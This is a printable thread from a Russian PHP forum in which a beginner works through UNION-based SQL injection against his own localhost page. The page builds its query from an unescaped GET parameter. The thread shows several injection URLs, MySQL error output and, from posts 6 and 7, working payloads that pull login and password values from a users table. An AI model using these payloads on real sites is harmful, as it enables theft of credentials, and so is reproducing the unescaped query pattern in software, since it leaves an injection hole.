Warning: Cannot use a scalar value as an array in /home/admin/public_html/forum/include/fm.class.php on line 757

Warning: Invalid argument supplied for foreach() in /home/admin/public_html/forum/include/fm.class.php on line 770
Форумы портала PHP.SU :: Версия для печати :: SQL инекция
Форумы портала PHP.SU » » Вопросы новичков » SQL инекция

Страниц (1): [1]
 

1. etoYA - 06 Ноября, 2011 - 07:45:14 - перейти к сообщению
Решил поигрался с инекцией, помогите разобратся с ошибками...
Вот по этой статье https://forum[dot]antichat[dot]net/threa[dot][dot][dot]v43966-1-10[dot]html
Вопросы:

Почему там написано к примеру http://site[dot]ru/index.php?id=-1 'UNION SELECT 1,2,3,4,5,6,7,8,9,10,11-- все должно работать, а у меня не работает
CODE (htmlphp):
скопировать код в буфер обмена
  1. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 1' at line 1

А если сделать так http://index.php?id=-1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11' , то все работает....

Потом, вот я типа подобрал кол-во столбцов, в моем случае 11, по коду выше выводит цифру 2. Но когда я пытаюсь ввести вместо этой цифры 2 login, то обламываюсь, типо

CODE (html):
скопировать код в буфер обмена
  1. Unknown column 'login' in 'field list'
но ведь 100% есть колонка login и именно под номером 2 в базе.

Инекцию делаю на этот запрос....

PHP:
скопировать код в буфер обмена
  1.  
  2. $id = $_GET['id'];
  3. $query = "SELECT * FROM `users` WHERE id='{$id}' LIMIT 1";
2. Мелкий - 06 Ноября, 2011 - 08:43:08 - перейти к сообщению
Чтобы проводить SQL-инъекции, надо понимать SQL. Читайте, как работает union, какие ограничения имеет.
3. etoYA - 06 Ноября, 2011 - 09:00:28 - перейти к сообщению
Я не собераюсь их проводить, я лиж для интереса, для себя.... Зачем читать, если кто-то может сказать, и показать на практике... Все что знаю в пхп учил методом тыка, прочитал очень мало, считай самые основы (как обьявляются переменные, как делать цикл и.т.д).
(Добавление)
я хочу выполнить запрос http://localhost/index.php?id=-1'UNION SELECT 1,login,3,4,5,6,7,8,9,10,11'

но ошибка:
PHP:
скопировать код в буфер обмена
  1. Unknown column 'login' in 'field list'


если делаю так

http://localhost/index.php?id=-1'UNION SELECT 1,login,3,4,5,6,7,8,9,10,11 FROM users'

то ошибка:
PHP:
скопировать код в буфер обмена
  1. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 1' at line 1


Обьясните в чем ошибка, и я пойму это... Улыбка
(Добавление)
С синтаксисом разобрался, но есть одно но, и вот оно ))..

http://localhost/scripts/profile[dot][dot][dot]?id=0'UNION SELECT 1,login,3,4,5,6,7,8,9,10,11 FROM users WHERE id='1 /*

Логин выводит, но другие поля нет..... Недовольство, огорчение
4. LIME - 06 Ноября, 2011 - 10:20:36 - перейти к сообщению
etoYA пишет:
Все что знаю в пхп учил методом тыка, прочитал очень мало, считай самые основы
это работает только в начале...чтоб глубже знать придется почитать
etoYA пишет:
Зачем читать, если кто-то может сказать, и показать на практике
после этих слов даже не стал читать вопрос дальше
не стыдно заставлять людей тратить время на вас на то что сами прочесть можете
5. etoYA - 06 Ноября, 2011 - 10:23:17 - перейти к сообщению
Так дело не в этом, я попробовал прочитать, но не понял.... А на примере посмотрю и будет гораздо больший шанс понять. И я разве кого-то заставляю?

P.S Это как и с ООП, читал, читал, а потом понял, что ничего не понял.....
(Добавление)
/close разобрался
6. OrmaJever - 06 Ноября, 2011 - 12:20:29 - перейти к сообщению
etoYA пишет:
http://localhost/scripts/profile[dot][dot][dot]?id=0'UNION SELECT 1,login,3,4,5,6,7,8,9,10,11 FROM users WHERE id='1 /*

Логин выводит, но другие поля нет.....

может так?
CODE (htmlphp):
скопировать код в буфер обмена
  1. http://localhost/scripts/profile...?id=0'UNION SELECT 1,concat_ws(0x3A,login,password),3,4,5,6,7,8,9,10,11 FROM users WHERE id='1 /*
7. etoYA - 06 Ноября, 2011 - 12:59:52 - перейти к сообщению
У меня получилось так, так выводит только 1 поле, т.е. допустим и логин и пароль не выводит, но зато выводит любое поле.
PHP:
скопировать код в буфер обмена
  1. http://localhost/scripts/profile.php?id=-1'UNION+SELECT+null,password,null,null,null,null,null,null,null,null,null+FROM users WHERE id='1 /*


P.S то что хотел узнать, узна. LIME, метод тыка все же работаетУлыбка)
(Добавление)
Эм... Ваш вариант то что надо !! Улыбка, обьясните пожалуйста, что значит contact_ws ?
(Добавление)
Разобрался с contact_ws

 

Powered by ExBB FM 1.0 RC1